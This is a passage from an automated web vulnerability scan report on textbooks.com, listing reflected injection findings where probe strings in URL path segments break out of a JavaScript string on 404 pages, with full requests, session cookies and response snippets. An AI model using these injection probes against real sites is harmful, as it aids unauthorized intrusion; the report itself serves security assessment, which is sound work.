Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3639
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:53:12 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
j    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/custserv-whatisused.php2f856';c87f43ffde1'

</script>
...[SNIP]...

1.57. http://www.textbooks.com/etextbooks.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /etextbooks.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85567'%3bc651150f7b2 was submitted in the REST URL parameter 1. This input was echoed as 85567';c651150f7b2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /etextbooks.php85567'%3bc651150f7b2 HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3630
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:53:19 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/etextbooks.php85567';c651150f7b2'

</script>
...[SNIP]...

1.58. http://www.textbooks.com/financial-aid-tips.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /financial-aid-tips.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f3de2'%3b9a01c7ac01 was submitted in the REST URL parameter 1. This input was echoed as f3de2';9a01c7ac01 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /financial-aid-tips.phpf3de2'%3b9a01c7ac01 HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3637
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:53:29 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
bj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/financial-aid-tips.phpf3de2';9a01c7ac01'

</script>
...[SNIP]...

1.59. http://www.textbooks.com/js/browse.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /js/browse.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 13b4d'%3b59c6dff461f was submitted in the REST URL parameter 1. This input was echoed as 13b4d';59c6dff461f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js13b4d'%3b59c6dff461f/browse.js HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3628
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:51:56 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
pSearchReset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/js13b4d';59c6dff461f/browse.js'

</script>
...[SNIP]...

1.60. http://www.textbooks.com/js/browse.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /js/browse.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a9fb9'%3bb75f6710835 was submitted in the REST URL parameter 2. This input was echoed as a9fb9';b75f6710835 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/browse.jsa9fb9'%3bb75f6710835 HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3628
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:51:57 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
et() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/js/browse.jsa9fb9';b75f6710835'

</script>
...[SNIP]...

1.61. http://www.textbooks.com/js/jquery-1.3.2.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /js/jquery-1.3.2.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 966f8'%3bf10ffd64761 was submitted in the REST URL parameter 1. This input was echoed as 966f8';f10ffd64761 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js966f8'%3bf10ffd64761/jquery-1.3.2.js HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3634
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:51:57 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
pSearchReset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/js966f8';f10ffd64761/jquery-1.3.2.js'

</script>
...[SNIP]...

1.62. http://www.textbooks.com/js/jquery-1.3.2.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /js/jquery-1.3.2.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b3e14'%3b0791930f4a was submitted in the REST URL parameter 2. This input was echoed as b3e14';0791930f4a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/jquery-1.3.2.jsb3e14'%3b0791930f4a HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
